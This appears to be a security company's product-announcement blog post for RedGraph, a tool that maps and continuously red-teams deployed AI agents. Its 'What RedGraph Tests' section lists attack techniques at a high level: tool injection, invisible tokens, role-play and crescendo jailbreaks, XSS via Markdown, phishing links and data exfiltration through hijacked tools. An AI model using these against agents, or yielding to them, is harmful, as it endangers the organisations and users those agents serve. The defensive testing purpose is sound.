Blog

min read

Pillar Security Unveils RedGraph: The World’s First Attack Surface Mapping & Continuous Testing for AI Agents

By

Dor Sarig

and

Ziv Karliner

December 10, 2025

min read

Today we're excited to announce RedGraph, the world's first attack surface mapping and testing tool for AI agents that enables security teams to discover and validate real exploits in their AI agents continuously. It interacts with AI systems through the browser and works with any web-accessible AI agent, including those built on Microsoft Copilot, Salesforce Agentforce, Google Agentspace, n8n, and more. All findings are exploit-validated and flow directly into Pillar's adaptive guardrails, creating a closed loop where defenses improve continuously alongside the testing. 

Why we built it

Security teams own AI agent security, but current tools only test AI models in isolation, divorced from the databases, APIs, tools, and internal data they connect to once deployed. This creates a complex attack surface that existing security testing completely misses. Traditional AI red teaming might give a clean bill of health for the model itself, but it can't see the business logic flaws and attack paths that emerge from the agent's real-world integrations.

RedGraph takes a fundamentally different approach: by directly interacting with your AI agent in its actual environment at runtime, it maps the entire attack surface - every connection, every permission, every potential pivot point from prompt to backend system, then feeds those findings into adaptive guardrails for immediate remediation

We built RedGraph together with our customers - based on their insights, feedback, and real challenges. They're already using it in production:

“We have numerous AI initiatives throughout the company. Unlike traditional red teaming, RedGraph continuously validates vulnerabilities in our AI agents' attack surface in production, providing complete attack paths that the engineering team can fix immediately. This marks a significant improvement in our security measures,” said Tomer Maman, CISO at Similarweb, a Pillar Security customer.״. Said Tomer Maman, CISO at Similarweb 

Discover Attack Path with Pillar RedGraph

Why This Changes the Game for Security Teams

How it works: 

RedGraph performs active reconnaissance to build a threat model of your specific business logic, then launches coordinated, multi-turn attacks to exploit system-level vulnerabilities. It bridges the gap between technical complexity and business oversight, allowing stakeholders to see exactly how an AI agent can compromise the organization.

This approach delivers four critical advantages:

1. Low Friction, High Visibility.

Security shouldn't be a black box accessible only to engineers. RedGraph creates a low-friction method for implementing red team assessments. Simply provide a target URL or authenticate like a real user, and RedGraph handles the rest, making continuous AI security accessible to non-technical stakeholders.

Zero-Code Integration: Connect via URL or user authentication

2. We Map the Kill Chain, Not Just the Assets.

Most tools give you a list of fuzzed prompts. RedGraph gives you a living map. It visualizes the complex web of your AI estate, showing exactly which agent can call which tool and where those tools connect to external systems. This graph-first view reveals the attack paths that actually matter.

Context-Aware Mapping: Spot logic flaws in real-world integrations

3. We Don't Guess. We Exploit.

This is the critical difference. RedGraph doesn't just flag that your "fetch_website" tool might be vulnerable to injection - it actively attempts to exploit it. The adversarial agents probe your application, pivot when blocked, and find the cracks in your business logic.

Exploitable Risk Focus: Validate real threats, ignore theoretical noise

4. We Hand You the Fix.

Security teams are tired of fighting with developers over theoretical risks. With RedGraph, you get exploit-validated proof. You can hand your engineering team a transcript/evidence showing exactly how the attack happened. Better yet, these findings feed directly into Pillar's adaptive guardrails, allowing you to automatically harden the system against the specific attack vectors we discovered.

Evidence-Based Remediation: Fix fast with full attack transcripts

Key Capabilities

Graph-First Attack-Path View

RedGraph represents your AI estate as nodes (assistants, agents, roles, tools,MCP servers, datasets, SaaS apps) and edges (can-call, can-read, can-render, has-permission). This illuminates unintended relationships and the paths they enable, showing you where real risk accumulates.

Business Context Awareness

RedGraph doesn't launch blind attacks. It applies application context to find business logic flaws, prioritize what matters, and map results directly to your threat landscape - minimizing noise and maximizing relevance.

Real-Time Adaptability

During assessments, agents dynamically adjust their tactics. If a path is blocked, they pivot - demonstrating attack behavior that ensures if there's a way in, RedGraph will find it, even as systems evolve.

What RedGraph Tests

RedGraph blends AI-specific risk analysis with web application security, providing visibility into the real-world weaknesses of agentic systems.

AI Model-Based Risks:

  • Threat-surface mapping: Reveals hidden roles, tools, capabilities, and unintended pathways the AI can reach
  • Attack-path flow analysis: Uses a graph view of your workflows to spot chained manipulations and multi-turn escalation attempts, then validates the path end-to-end
  • Evasion & deception: Exercises Unicode tricks, invisible tokens, adversarial formatting, role-play social engineering, and crescendo (multi-turn) sequences to pressure-test defenses

Web Application Risks:

  • Unsafe markdown rendering: Detects when the AI can be manipulated into generating malicious Markdown or code blocks that execute XSS payloads within the user interface
  • Malicious link rendering: Finds cases where the agent is coerced into hallucinating or serving phishing URLs that the application renders as trusted, clickable links.
  • Data-exfiltration vectors: Exercises how the agent’s legitimate access to tools (like file uploads or API connectors) can be hijacked to bypass controls and leak sensitive context.

Advanced, Effective, and Built for the Agentic Era

We built RedGraph on a simple premise: the best defense against autonomous AI systems is an autonomous adversary. This is the world's first AI Attack Surface Management capability embedded within a comprehensive security platform, creating something fundamentally new. This approach delivers a recursive defense model where offense and defense evolve together. Every vulnerability RedGraph discovers flows directly into Pillar's adaptive guardrails, transforming your security posture from static protection into a living system that learns and strengthens with every assessment.

RedGraph is available and already in use with Fortune 500 and innovative companies, visit pillar.security/redgraph to schedule a demonstration or contact sales@pillar.security.

Subscribe and get the latest security updates

Back to blog

MAYBE YOU WILL FIND THIS INTERSTING AS WELL